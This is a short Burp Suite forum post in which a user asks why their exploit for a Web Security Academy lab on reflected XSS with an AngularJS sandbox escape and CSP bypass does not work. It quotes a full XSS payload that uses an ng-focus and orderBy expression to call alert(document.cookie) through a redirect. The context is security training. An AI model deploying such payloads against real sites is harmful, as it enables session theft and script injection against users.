The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Reflected XSS with AngularJS sandbox escape and CSP

PhenomAnon | Last updated: Oct 22, 2022 04:09AM UTC

I entered this script in the exploit server body and I'm not sure why it is not working? <script> location='https://0a72006b0387cdf0c044031700fd00dc.web-security-academy.net/?search=%3Cinput%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27%3E#x'; </script> Can you help?

PhenomAnon | Last updated: Oct 22, 2022 04:12AM UTC